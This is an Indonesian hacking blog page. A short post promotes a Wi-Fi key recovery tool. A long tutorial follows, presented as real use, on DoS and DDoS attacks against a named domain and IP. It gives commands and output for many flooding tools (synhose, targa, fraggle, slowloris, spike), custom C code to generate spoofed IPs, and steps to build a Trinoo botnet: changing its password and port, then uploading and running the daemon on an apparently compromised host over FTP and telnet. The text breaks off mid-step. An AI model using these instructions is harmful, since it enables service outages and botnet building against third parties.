decrypt [crack] Key Network & Password WiFi/Hotspo t

Posted in 18 October 2010
by DareDeviL

Semenjak beberapa tahun belakangan ini, dibeberapa tempat publik di Indonesia telah dipasang sejumlah arena wi-fi/hotspot yang memanjakan para penjelajah internet untuk melakukan aktivitas dunia mayanya. Nah, pernahkah anda merasa sebel jika sebuah jaringan tak menghendaki anda masuk atau menggunakan dengan proteksi password member?

Wow, coba gunakan Wireless Key View v1.15. Dengan software ini anda mampu melihat Nama jaringan, Tipe Key Networknya, dan hash passwordnya, sekaligus hasil cracknya. Segera coba, download dulu di:
http://www.4shared.com/file/233386248/bfc86a03/Wireless_Key_View_116.html

Review:

WirelessKeyView recovers all wireless network keys/passwords (WEP/WPA) stored in your computer by the ‘Wireless Zero Configuration’ service of Windows XP and by the ‘WLAN AutoConfig’ service of Windows Vista. It allows you to easily save all keys to text/html/xml file, or copy a single key to the clipboard.

WirelessKeyView doesn’t require any installation process or additional DLL files. Just copy the executable file (WirelessKeyView.exe) to any folder you like, and run it.
After you run it, the main window should displayed all WEP/WPA keys stored in your computer by Windows ‘Wireless Zero Configuration’ service. For WEP keys, the key is also displayed in Ascii form. Be aware that this utility can only reveal the network keys stored by Windows operating system. It cannot recover network keys stored by any other third-party software.

Deleting Wireless Keys Of Old Network Adapters
Starting from version 1.15 of WirelessKeyView, you can delete wireless keys/passwords of old network adapters that are no longer plugged to your computer, by using the ‘Delete Selected Items’ option.
Be aware that this delete option only works for network adapters that are not active anymore. If your network adapter is active, use the standard user interface of Windows to delete the unwanted keys.

Command-Line Options
/external Load the wireless keys from external instance of Windows XP.
/stext Save the list of all wireless keys into a regular text file.
/stab Save the list of all wireless keys into a tab-delimited text file.
/stabular Save the list of all wireless keys into a tabular text file.
/shtml Save the list of all wireless keys into HTML file (Horizontal).
/sverhtml Save the list of all wireless keys into HTML file (Vertical).
/sxml Save the list of all wireless keys to XML file.

System Requirement

* Windows XP with SP1 or greater.
* You must login to windows with admin user.
* filesize: 1.5mb

Read more

crack crack crack dos ddos

Posted in
by DareDeviL

Yup kembali lagi bersama saya mywisdom kali ini tentang teknik serangan favorit ala cracker jaman dulu (termasuk saya sendiri seorang cracker) yaitu Remote DOS dan DDOS. Perhatikan perbedaan DDOS dan DOS:
- ddos dilakukan dari banyak zombie kita yaitu mesin-mesin yang sudah kita owned dan bisa dimanfaatkan untuk serangan
- dos adalah serangan yang berasal hanya dari 1 mesin saja!!!

Sebelum melakukan DOS atau DDOS Anda wajib mengetahui port - port daemon yang terbuka di target kita, misal kita menggunakan nmap port scanner untuk target kita sec-r1z.com, satu hal yang wajib diingat oleh tiap cracker (nama domain sec-r1z.com hanyalah sekedar contoh) yang ingin melakukan dos maupun ddos adalah sebaiknya tidak menyerang alamat ip target tapi menyerang domain / hostname karena alamat ip bisa diubah sewaktu-waktu untuk menhindari dos maupun ddos. Sebelum ddos maupun dos mari kita scan daemon -daemon yang terbuka untuk celah bagi kita menyerang, berikut ini contoh penggunaan scanning port dengan nmap:

Code:
bt ~ # nmap -A sec-r1z.com -PN  Starting Nmap 4.60 ( http://nmap.org ) at 2010-03-22 04:33 GMT Interesting ports on 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86): Not shown: 1668 closed ports, 36 filtered ports PORT     STATE SERVICE  VERSION 21/tcp   open  ftp      PureFTPd |_ Anonymous FTP: FTP: Anonymous login allowed 22/tcp   open  ssh      OpenSSH 4.3 (protocol 2.0) 25/tcp   open  smtp     Exim smtpd 4.69 |  SMTP: Responded to EHLO command |  b0x.sec-r1z.com Hello example.org [111.94.9.19] |  SIZE 52428800 |  PIPELINING |  AUTH PLAIN LOGIN |  STARTTLS |  250 HELP |  Responded to HELP command |  Commands supported: |_ AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP 53/tcp   open  domain 110/tcp  open  pop3     Courier pop3d 143/tcp  open  imap     Courier Imapd (released 2008) 443/tcp  open  http     Apache httpd 2.0.63 |_ HTML title: Site doesn't have a title. 465/tcp  open  ssl/smtp Exim smtpd 4.69 |  SSLv2: server still supports SSLv2 |_      the server didn't offer any cyphers 993/tcp  open  ssl/imap Courier Imapd (released 2008) |  SSLv2: server still supports SSLv2 |_      the server didn't offer any cyphers 995/tcp  open  ssl/pop3 Courier pop3d |  SSLv2: server still supports SSLv2 |_      the server didn't offer any cyphers 3306/tcp open  mysql    MySQL 5.0.90-community |  MySQL Server Information: Protocol: 10 |  Version: 5.0.90-community |  Thread ID: 9230 |  Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection |  Status: Autocommit |_ Salt: @Te"s?}zn9nA:?l"cM6e Device type: storage-misc Running (JUST GUESSING) : BlueArc embedded (91%) Aggressive OS guesses: BlueArc Titan 2100 NAS device (91%) No exact OS matches for host (test conditions non-ideal). Service Info: Host: b0x.sec-r1z.com  TRACEROUTE (using port 21/tcp) HOP RTT    ADDRESS 1   0.09   192.168.153.2 2   280.82 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86)  OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 579.436 seconds bt ~ #
Ok dari hasil scan ke sec-r1z.com kita bisa lihat kalau port-port berikut ini terbuka sehingga memungkinkan serangan kita:
Code:
21 22 25 53 110 143 443 465 993 995 3306
Jadi kita bisa menggempur target kita ke semua port tersebut.

Tips!!!
Agar DDOS lebih efektif sebaiknya serang semua port daemon yang terbuka
dan bagi yg port 80 open serangan difokuskan lebih ke port 80.


Aneka Tool & Teknik Untuk DOS / DDOS

Asiknya ICMP ATTACK
Ok selanjutnya kita bisa juga melakukan pengujian apakah box tersebut bisa
kita serang dengan icmp packets:
Code:
bt ~ # ping sec-r1z.com PING sec-r1z.com (74.63.241.86) 56(84) bytes of data. 64 bytes from 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86): icm=10 ttl=128 time=273 ms  [2]+  Stopped                 ping sec-r1z.com bt ~ #
Ok kita bisa melihat ketika kita ping sec-r1z.com dan ipnya diresolve ke 74.63.241.86 dan juga direply langsung olehnya :
reply 64 bytes dari 74.63.241.86 yang menandakan kita bisa menambahkan efek serangan icmp ke target kita.

Contoh Teknik dasar untuk melakukan ping flood dari root shell unix atau linux kita, ketikkan ini (misal target host adalah sec-r1z.com):
Code:
ping sec-r1z.com -fs 50000 PING sec-r1z.com (74.63.241.86) 50000(50028) bytes of data. ....................................................... [3]+  Stopped                 ping sec-r1z.com -fs 50000
Asiknya SYN Attack

syn attack merupakan salah satu metode penyerangan favorit attacker jaman dulu yang memanfaatkan kelemahan three way handsake.
Salah satu tool yang biasa saya pakai untuk syn attack adalah synhose, Di mana synhose ini akan melakukan spoof random ip untuk mengirimkan paket ke target kita, sehingga seolah olah di target kita menerima banyak serangan dari ip yang berbeda.
SEcara default jika tidak diset di argumen maka synhose akan menyerang port 80, bisa kita liat di sourcenya:
Code:
 if(port == 0) port = 80;
Misal kita akan menyerang sec-r1z.com di port terbuka 80 dari 10 spoof ip berbeda berikut ini contohnya:
Code:
bt ~ # ./synhose sec-r1z.com 80 10 SynHose [A random source IP syn flooder] Written by knight / Idea by   : rza  Destination  : sec-r1z.com Port         : 80 NumberOfTimes: 10  SynHosing sec-r1z.com at port 80 from 108.248.253.31 port 2884 SynHosing sec-r1z.com at port 80 from 248.36.16.139 port 4 SynHosing sec-r1z.com at port 80 from 68.48.179.170 port 409 SynHosing sec-r1z.com at port 80 from 5.54.172.218 port 9780 SynHosing sec-r1z.com at port 80 from 156.228.227.167 port 5327 SynHosing sec-r1z.com at port 80 from 108.99.240.141 port 1746 SynHosing sec-r1z.com at port 80 from 242.249.38.240 port 924 SynHosing sec-r1z.com at port 80 from 111.233.60.127 port 4544 SynHosing sec-r1z.com at port 80 from 60.194.164.239 port 4234 SynHosing sec-r1z.com at port 80 from 174.243.162.91 port 8044 bt ~ #
dari result di atas komputer kita mengirimkan paket syn ke sec-r1z.com dengan port tujuan 80 dari berbagai ip, misal yang terakhir dari spoof ip 174.243.162.91 melalui port 8044.

Hanya dari 10 ip tentu kurang sedap bukan?? mari kita serang dari 10000 ip berbeda:
Code:
bt ~ # ./synhose sec-r1z.com 80 10000
ooopssssss )

Juno
Juno merupakan syn attack tool yang cukup terkenal, berikut ini adalah contoh cara pakainya (misal target adalah sec-r1z.com di port 80):
Code:
bt ~ # ./juno sec-r1z.com 80 juno.c by Sorcerer of DALnet death to 74.63.241.86:80




syndrop

Syndrop merupakan tool yang mengabungkan syn attack dan teardrop,berikut ini adalah contoh penggunaan syndrop dengan target host sec-r1z:
Code:
bt ~ # ./syndrop 127.0.0.1 sec-r1z.com -s 31337 -t 80 -n 99999999 -S 20 -E 9999 syndrop by PineKoan Death on flaxen wings: From:       127.0.0.1.31337   To:    74.63.241.86.   80  Amt: 99999999 [ b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b0




--------------------------------------------------------------------------


Jolt



Jika dilihat dari source codenya,Jolt merupakan salah satu tool untuk DOS yang akan mengirimkan paket icmp ke target kita, Pada jaman dahulu kala jolt ini banyak digunakan untuk membekukan server - server windows
jenis serangan adalah pengiriman paket icmp
Code:
 icmp->type = ICMP_ECHO;
Berikut ini demo penggunaan jolt:
Code:
bt ~ # ./jolt 74.63.241.86 127.0.0.1 99999999 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 Sending to 74.63.241.86 ..................dst
Targa

Targa merupakan tool dos yang merupakan kombinasi dari tool2 ini:

* bonk by route|daemon9 & klepto
* jolt by Jeff W. Roberson (modified by Mixter for overdrop effect)
* land by m3lt
* nestea by humble & ttol
* newtear by route|daemon9
* syndrop by PineKoan
* teardrop by route|daemon9
* winnuke by _eci

header2 file yang digunakan oleh targa cukup repot juga dan tidak ada di backtrack secara default, jadi saya tambahkan sendiri, berikut ini header file saya di /usr/include/netinet sehingga berhasil mengkompile targa.c:
Code:
bt netinet # ls ether.h  if_ether.h  if_tr.h  in.h        ip.h   ip_icmp.h  ip_udp.h    protocols.h  udp.h icmp6.h  if_fddi.h   igmp.h   in_systm.h  ip6.h  ip_tcp.h   protocol.h  tcp.h bt netinet #
Misal kita ingin menyerang seluruh range ip dari range ip 74.63.241.86-74.63.241.88


Berikut ini adalah contohnya:
Code:
bt ~ # ./targa 74.63.241.86 74.63.241.88 -t 0 -n 999999                 targa 1.0 by Mixter Leetness on faxen wings: To: 74.63.241.86 - 74.63.241.88 Repeats: 999999    Type:     0 74.63.241.86 [ $$$$$$$$$$$$$$$@@@@@@@@@@@@@@@-----....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................#####################&&&&&&&&&&&&&&&&&&&&&%%%%%%%%%%%%%%%%%%%%%
opsi -t 0 berarti anda menyerang dengan menggunakan gabungan semua teknik.
opsi -n 999999 merupakan jumlah pengulangan sebanyak 999999


Boink
Merupakan tool yang bisa membuat blue screen of death pada mesin-mesin windows 9x dan nt.
Berikut ini contoh cara penggunaanya:
Code:
bt ~ # ./boink 127.0.0.1 74.63.241.86 80 80 99999999999 (0)74.63.241.86:25->65 (1)74.63.241.86:25->65 (2)74.63.241.86:25->65 (3)74.63.241.86:25->65 (4)74.63.241.86:25->65 (5)74.63.241.86:25->65 (6)74.63.241.86:25->65 (7)74.63.241.86:25->65 (8)74.63.241.86:25->65 (9)74.63.241.86:25->65 (10)74.63.241.86:25->65 (11)74.63.241.86:25->65 (12)74.63.241.86:25->65 (13)74.63.241.86:25->65 (14)74.63.241.86:25->65 (15)74.63.241.86:25->65 (16)74.63.241.86:25->65 (17)74.63.241.86:25->65 (18)74.63.241.86:25->65 (19)74.63.241.86:25->65 (20)74.63.241.86:25->65 (21)74.63.241.86:25->65 (22)74.63.241.86:25->65 (23)74.63.241.86:25->65 (24)74.63.241.86:25->65 (25)74.63.241.86:25->65 dst ...........
Asiknya Smurf & UDP Attack

Smurf attack merupakan teknik penyerangan dengan mengirimkan paket icmp yang dispoof ke target kita

Bloop
Merupakan salah satu tool dos dengan metode smurf attack.
Bloop akan mengirimkan paket icmp spoof secara acak ke target kita untuk membuat mesin target crash.

Berikut ini adalah contoh penggunaan bloop:
Code:
bt ~ # ./bloop 127.0.0.1 sec-r1z.com 99999999 Bloop v 1.0    Status: Connected....packets sent.



Fraggle
Fraggle merupakan tool untuk tipe smurf dos / ddos yang menggunakan suatu file broadcast yang berisi daftar alamat2 ip spoof.

Sebelum menggunakan fraggle kita memerlukan sebuah file broadcast ip spoof, Untuk itu
saya sudah membuat sendiri tool untuk spoof ip generator namanya dimas.c:

filename:dimas.c , programmer: mywisdom
Code:
/*dimas.c random ip generator (public ip and private ip) version 1.0 c0d3r: mywisdom greetz:gunslinger,flyff666,kiddies,xtr0nic,whitehat,Danzel and so on */ #include  #include  #include  void bikin_random_ip()  { FILE *dom2; int a,b,c,d,a2,b2,jum; dom2=fopen("ip.txt","w+");       for(;;)  {    srand ( time(NULL) );       a = rand ()% 255 ;             b = rand ()% 255 ;             c = rand ()% 255 ;            d = rand ()% 255 ;       if ( (a != 10) && (a != 172) && (a != 192))     {             if(dom2!=NULL)        {          if(a2!=a)          {           fprintf(dom2,"%d.%d.%d.%d\n",a,b,c,d);          }         }    }   a2=a;  } fclose(dom2);   }  int main () { bikin_random_ip(); return 0; }
kompile file di atas dan run untuk membuat file ip spoof dengan nama file: ip.txt

Code:
gcc -o dimas dimas.c ./dimas
Selanjutnya misal target kita sec-r1z.com, contoh penggunaan fraggle untuk menyerang sec-r1z.com:
Code:
bt ~ # ./fraggle sec-r1z.com  ip.txt 2000 900   80 0   99  fraggle.c by TFreak  Flooding sec-r1z.com (. = 25 outgoing packets) ................................................................................ Done!  bt ~ #



TCP Attack
Khusus untuk http ddos banyak tool yang bisa kita pakai
misal:
slowloris

slowloris biasanya khusus digunakan untuk menyerang http port
,keunggulan slowloris adalah hanya menggunakan bandwoth yang kecil dari server attacker,
tool ini akan mengirimkan http request dalam ukuran panjang berupa angka random panjang
terlihat dari source codenya:
Code:
if ($cache) {                         $rand = "?" . int( rand(99999999999999) );                     }
Contoh penggunaan slowloris untuk menyerang sec-r1z.com :

Code:
bt ~ # ./slowloris.pl -dns www.sec-r1z.com -port 80 -timeout 30 -num 500 -cache  CCCCCCCCCCOOCCOOOOO888@8@8888OOOOCCOOO888888888@@@@@@@@@8@8@@@@888OOCooocccc:::: CCCCCCCCCCCCCCCOO888@888888OOOCCCOOOO888888888888@88888@@@@@@@888@8OOCCoococc::: CCCCCCCCCCCCCCOO88@@888888OOOOOOOOOO8888888O88888888O8O8OOO8888@88@@8OOCOOOCoc:: CCCCooooooCCCO88@@8@88@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888@8888OOOCc:::: CooCoCoooCCCO8@88@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc: ooooooCoCCC88@88888@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88@888OCoccc ooooCCOO8O888888888@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo oCCCCCCO8OOOCCCOO88@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC oCCCCCOOO88OCooCO88@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC oCCCCOO88OOCCCCOO8@@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO CCCOOOO88OOCCOOO8@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O CCCOO88888OOCOO8@@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO OOOOOO88888OOOO8@8@8Ooc:.:...cOO8O88c.      .  .coOOO888OOOOCoooooccoCOOOOOCOOOO OOOOO888@8@88888888Oo:. .  ...cO888Oc..          :oOOOOOOOOOCCoocooCoCoCOOOOOOOO COOO888@88888888888Oo:.       .O8888C:  .oCOo.  ...cCCCOOOoooooocccooooooooCCCOO CCCCOO888888O888888Oo. .o8Oo. .cO88Oo:       :. .:..ccoCCCooCooccooccccoooooCCCC coooCCO8@88OO8O888Oo:::... ..  :cO8Oc. . .....  :.  .:ccCoooooccoooocccccooooCCC :ccooooCO888OOOO8OOc..:...::. .co8@8Coc::..  ....  ..:cooCooooccccc::::ccooCCooC .:::coocccoO8OOOOOOC:..::....coCO8@8OOCCOc:...  ....:ccoooocccc:::::::::cooooooC ....::::ccccoCCOOOOOCc......:oCO8@8@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo .......::::::::cCCCCCCoocc:cO888@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc ...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co .............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo  ..... ............. .coocoooCCoco:::ccccccc:::ccc::..........  ....:::cc::::coC    .  . ...    .... ..  .:cccoCooc:..  ::cccc:::c:.. ......... ......::::c:cccco   .  .. ... ..    .. ..   ..:...:cooc::cccccc:.....  .........  .....:::::ccoocc        .   .         .. ..::cccc:.::ccoocc:. ........... ..  . ..:::.:::::::ccco   Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client  Defaulting to a 5 second tcp connection timeout. Multithreading enabled. Connecting to www.sec-r1z.com:80 every 30 seconds with 500 sockets:                 Building sockets.                 Building sockets.                 Building sockets.                 Building sockets.                 Building sockets.                 Building sockets.                 Building sockets.                 Building sockets.                 Building sockets.                 Building sockets.


Tembak.c
Ini sih tool buat nuke yang udah lama banget buatan anak echo ) dah ada dari jaman baheula ), ok mari kita coba pakai lagi untuk contoh target sec-r1z.com :
Code:
bt ~ # ./tembak  Kirim Paket ke IP orang  Cara Pake : $ tembak hostname.orang port  bt ~ # ./tembak sec-r1z.com 80  Serbuu....!!!! Hancurkaannn sec-r1z.com ke port 80



httpd_flood.pl
Ini dia nih perl skrip khusus untuk mengantung socket httpd ).khusus hanya menyerang http daemon (port 80)
Berikut ini adalah contoh cara pakainya, misal target tbd.my, misal kita menggunakan lama serangan infinite (selamanya) dan kita run di background di salah satu mesin yang kita root:
Code:
./httpd_flood.pl tbd.my -1 99999 -1 &
Teknik Serangan Gabungan
Teknik serangan gabungan ini menggabungkan aneka jenis serangan, Anda bisa coba tool ini: spike
ok mari kita lihat semua tool2 yang digabung menjadi satu teknik serangan mematikan oleh spike:
Code:
bt spike # ls README  bin/  sources/  spike.sh*  spike.sh~* bt spike # ls bin 1234*   conseal*  jolt*   latierra*  orgasm*  spiffit*  teardrop* beer*   dcd3c*    kkill*  misfrag*   pepsi*   sping*    trash* boink*  fawx*     koc*    nestea*    pimp*    stream*   udpdata* bonk*   gewse*    kox*    newtear*   pong*    syndrop*  wingatecrash* coke*   gewse5*   land*   opentear*  smurf*   synk* bt spike #
sudah anda lihat kan? tool ini menggabungkan berbagai macam ddos tool menjadi 1
Mari kita coba run tool ini untuk attack target kita misal: sec-r1z.com
Code:
bt spike # ./spike.sh sec-r1z.com  Main Menu For spike.sh 1] Combo Attacks 2] Pick The Attack 3] Pick The Attack2 (Enter Your Own Info) 4] Class C Attack (Drop A Class C) 5] Never Die (Attacks That Never Die) 6] Clean up (Kill Hung Attacks) 7] Info Menu (Other Info About spike.sh) 8] To Exit Out  Enter The Number Of The Option To Run:
misal kita ingin menggunakan combo attack untuk menyerang target kita
ketikkan 1.

Maka akan muncul pilihan 3 jenis serangan berdasarkan tingkat ganasnya serangan ( kek maen game aja yah hahahaahaha):
Code:
ComboAttack Menu\033[0m  1] Light Attack   (12 Attacks)  2] Medium Attack  (20 Attacks)  3] Hard Attack    (33 Attacks)  4] To Exit Out  Enter The Number Of The Option To Run #> \c
Misal kita pilih yang hard attack, ketikkan 3 !!!
Code:
ComboAttack Menu\033[0m  1] Light Attack   (12 Attacks)  2] Medium Attack  (20 Attacks)  3] Hard Attack    (33 Attacks)  4] To Exit Out  Enter The Number Of The Option To Run #> \c 3 Teadroping..... Completed.... Pimping..... Completed.... Nesteaing..... Completed.... Misfraging..... Completed.... Syndroping..... Completed.... Koxing..... Completed.... NewTearing..... Completed.... Bonking..... Completed.... Fawxing..... Completed.... Trashing..... Completed.... Smurfing.... Completed.... Attacking On Hold For BandWidth Completed.... Boinking..... Completed.... Conseal Firewall Attacking..... Completed.... Jolting..... Completed.... Modem +++ DoSing dst...



Pembahasan Khusus Tambahan

Trinoo
Trinoo merupakan tool ddos yang sangat populer sejak dulu menggunakan sistem daemon slave sebagai zombie dan master server sebagai pengontrol attack. Ok trinoo ini pada jaman dulu bisa melakukan pengembangan jaringan zombie otomatis dengan scanning range ip poblik lalu melakukan eskploitasi terhadap bug lama wu ftpd , dll untuk dijadikan zombie.
pertama download dulu trinoo dan ekstrak:
Code:
wget http://packetstormsecurity.org/distributed/trinoo.tgz tar zxvf trinoo.tgz
Mari saya jelaskan isinya trinoo dan gimana cara kerjanya:

Code:
bt trinoo # ls BENSUQS  daemon/  master/  password  trinoo.tgz
yang ada di folder daemon adalah yang akan kita pasang di zombie kita yaitu mesin2 yang sudah kita owned.

Mengedit dan menyetting daemon trinoo
Untuk mengkompile daemon trinoo ini membutuhkan lib crypt dalam glibc.
Mari kita kompile Daemon trinoo gunakan perintah ini:
Code:
bt daemon # gcc -o ns ns.c -lcrypt bt daemon #
Source code asli dari compare password pada daemon trinoo adalah:
Code:
 if (strcmp((char *)crypt(pass, "aI"), "aIf3YWfOhw.V.")==0) {
Jadi kita bisa melihat bahwa fungsi:
crypt(pass, "aI"), "aIf3YWfOhw.V.")
plain text sebelum di crypt sebenarnya adalah: l44adsl

l44adsl ini adalah password default trinoo

crypt ini adalah one way hash yg tidak bisa didekrip sebenarnya.


di mana sintaks fungsi crypt ini adalah:

char * crypt (const char *key, const char *salt)


di mana daemon trinoo ini default akan bind port 27444/udp dengan default password l44adsl

Misal Anda ingin mengganti default password dan default port untuk daemon trinoo, gunakan tool yang saya buat ini:

Code:
/*Devilzc0de trinoo hash generator programmer: mywisdom */ #include  #include  int main(int argc, char *argv[]) { char *data;  int hasil;  hasil=crypt(argv[1], "aI");  printf("trinoo hash anda adalah:%s\n",hasil); }
Selanjutnya kompile dan jalankan, misal saya ingin mencari hash dari password: mywisdom
Code:
bt ~ # gcc -o trinoo_hash trinoo_hash.c -lcrypt trinoo_hash.c:13:2: warning: no newline at end of file bt ~ # ./trinoo_hash mywisdom trinoo hash anda adalah:aI3Kc25mvwsN2 bt ~ #
ok selanjutnya kita edit source daemon di ns.c di mana kita ganti hash password trinoo tadi yg line ini:
Code:
 if (strcmp((char *)crypt(pass, "aI"), "aIf3YWfOhw.V.")==0) {
kita akan ubah menjadi:
Code:
if (strcmp((char *)crypt(pass, "aI"), "aI3Kc25mvwsN2")==0) {
yang berarti password default daemon trinoo telah diganti menjadi: mywisdom

Sedangkan untuk mengganti default port trinoo misal kita mao ubah jadi port: 31337
kita ubah line ini di ns.c:
Code:
 sa.sin_port = htons(27444);
menjadi:
Code:
 sa.sin_port = htons(31337);
TErakhir jangan lupa setting alamat ip master dengan mengedit line berikut ini diganti alamat ip masternya:
Code:
char *master[] = {   "129.237.122.40",   "207.228.116.19",   "209.74.175.130",   NULL
penting!!! jangan lupa diganti alamat ip masternya klo gak tar jadi zombie orang!!!!

Selanjutnya kompile ulang daemon trinoo anda:
Code:
gcc -o ns ns.c -lcrypt
Ok selanjutnya silahkan upload dan run ke mesin yang sudah kita owned , misal:
Code:
bt daemon # ftp pcorders.com Connected to pcorders.com. 220 ns3.pcorders.com FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready. Name (pcorders.com:root): mywisdom 331 Password required for mywisdom. Password: 230 User mywisdom logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> put ns local: ns remote: ns 200 PORT command successful. 553 ns: Permission denied. ftp> cd /tmp 250 CWD command successful. ftp> put ns local: ns remote: ns 200 PORT command successful. 150 Opening BINARY mode data connection for ns. 226 Transfer complete. 10814 bytes sent in 0.00175 secs (6.1e+03 Kbytes/sec) ftp>                   ftp> quit 221-You have transferred 10814 bytes in 1 files. 221-Total traffic for this session was 11363 bytes in 1 transfers. 221-Thank you for using the FTP service on ns3.pcorders.com. 221 Goodbye. bt daemon # telnet pcorders.com Trying 204.181.205.145... Connected to pcorders.com. Escape character is '^]'.  Red Hat Linux release 6.1 (Cartman) Kernel 2.2.12-20 on an i686 mlogin: mywisdom Password: Last login: Wed May  5 02:10:58 from 105.subnet125-160-218.speedy.telkom.net.id [admin@ns3 admin]$ ptrace [t@ns3 admin]# cd /tmp [t@ns3 /tmp]# ./ns sh: ./ns: Permission denied [t@ns3 /tmp]# chmod +x ns [t@ns3 /tmp]# ./ns
Ok sudah run secara demonize di mesin slave kita , mari kita liat bind portnya:
Code:
[t@ns3 /tmp]# netstat -a | grep udp udp        0      0 *:1161                  *:* udp        0      0 *:1160                  *:* udp        0      0 *:1159                  *:* udp        0      0 *:27444                 *:* udp      224      0 ns3.pcorders.com:1156   192.168.1.1:domain      ESTABLISHED udp      224      0 ns3.pcorders.com:1155   192.168.1.1:domain      ESTABLISHED udp        0      0 *:ntalk                 *:* udp        0      0 *:talk                  *:* udp        0      0 *:sunrpc                *:* [t@ns3 /tmp]#
ok keliatan kan ada listening port udp 27444?
Ok selanjutnya kita compile dan run daemon master di mesin yang kita owned yang mao kita jadikan master slave

Untuk mengganti password default master lakukan langkah yang sama tapi line yg diganti adalah file master.c ini:

#define CRYPTKEY "ZsoTN.cq4X31"

ok misal saya install masternya di alamat ip x.x.x.x:
Code:
